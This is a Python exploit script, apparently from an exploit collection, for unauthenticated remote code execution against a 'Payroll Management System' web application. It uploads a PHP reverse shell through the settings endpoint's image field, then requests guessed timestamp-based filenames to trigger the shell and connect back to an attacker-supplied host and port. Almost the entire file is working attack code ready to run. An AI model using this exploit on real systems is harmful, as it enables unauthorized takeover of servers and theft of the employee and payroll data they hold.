#!/usr/bin/python
import argparse
import time
import requests


class Exploit:
    def __init__(self, rhost, rport, lhost, lport, https):
        self.rhost = rhost
        self.rport = rport
        self.lhost = lhost
        self.lport = lport
        self.targetUrl = f'https://{rhost}:{rport}' if https else f'http://{rhost}:{rport}'
        self.banner()

    def banner(self):
        print("""
  _____                      _ _                               
 |  __ \                    | | |                              
 | |__) |_ _ _   _ _ __ ___ | | |                              
 |  ___/ _` | | | | '__/ _ \| | |                              
 | |  | (_| | |_| | | | (_) | | |                              
 |_|  _\__,_|\__, |_|  \___/|_|_|                          _   
 |  \/  |     __/ |                                       | |  
 | \  / | __ |___/_   __ _  __ _  ___ _ __ ___   ___ _ __ | |_ 
 | |\/| |/ _` | '_ \ / _` |/ _` |/ _ \ '_ ` _ \ / _ \ '_ \| __|
 | |  | | (_| | | | | (_| | (_| |  __/ | | | | |  __/ | | | |_ 
 |_|__|_|\__,_|_| |_|\__,_|\__, |\___|_|_|_| |_|\___|_|_|_|\__|
  / ____|         | |       __/ |     |  __ \ / ____|  ____|   
 | (___  _   _ ___| |_ ___ |___/___   | |__) | |    | |__      
  \___ \| | | / __| __/ _ \ '_ ` _ \  |  _  /| |    |  __|     
  ____) | |_| \__ \ ||  __/ | | | | | | | \ \| |____| |____    
 |_____/ \__, |___/\__\___|_| |_| |_| |_|  \_\\_____|______|   
          __/ |                                                
         |___/                                                  
        """)

    def getData(self):
        return {
            'name': 'John Doe',
            'email': 'jdoe@gmail.com',
            'contact': 'John Doe',
            'about': 'John Doe',
        }

    def getPayload(self):
        with open('php_reverse_shell.php', 'r') as file:
            rev_shell = file.read().replace('LHOST', self.lhost).replace('LPORT', self.lport)
            return rev_shell

    def uploadRevShell(self):
        url = f'{self.targetUrl}/ajax.php?action=save_settings'
        print(f'Uploading a reverse shell via {url}')
        requests.post(url, files={'img': ('a.php', self.getPayload())},
                      data=self.getData())
        epoch = time.time()
        timestamp = epoch - (epoch % 60)
        timestamp_minus_one_min = timestamp - 60
        timestamp_plus_one_min = timestamp + 60
        return [f'{int(timestamp)}_a.php', f'{int(timestamp_minus_one_min)}_a.php',
                f'{int(timestamp_plus_one_min)}_a.php']

    def openRevShell(self, candidates):
        print('Opening a reverse shell')
        for candidate in candidates:
            url = f'{self.targetUrl}/assets/img/{candidate}'
            try:
                requests.get(url).raise_for_status()
                print(f'Got a success response for {url}, you should have a revshell')
                return
            except Exception as e:
                print(f'Failed to open revshell using {url}')
        print('Guessing filename failed')

    def exploit(self):
        candidates = self.uploadRevShell()
        self.openRevShell(candidates)


def get_args():
    parser = argparse.ArgumentParser(
        description='Payroll Management System - Remote Code Execution (RCE) (Unauthenticated)')
    parser.add_argument('-rhost', '--remote-host', dest="rhost", required=True, action='store', help='Remote host')
    parser.add_argument('-rport', '--remote-port', dest="rport", required=False, action='store', help='Remote port',
                        default=80)
    parser.add_argument('-lhost', '--local-host', dest="lhost", required=True, action='store', help='Local host')
    parser.add_argument('-lport', '--local-port', dest="lport", required=True, action='store', help='Local port')
    parser.add_argument('-https', '--https', dest="https", required=False, action='store_true', help='Use https')
    args = parser.parse_args()
    return args


if __name__ == '__main__':
    args = get_args()
    exp = Exploit(args.rhost, args.rport, args.lhost, args.lport, args.https)
    exp.exploit()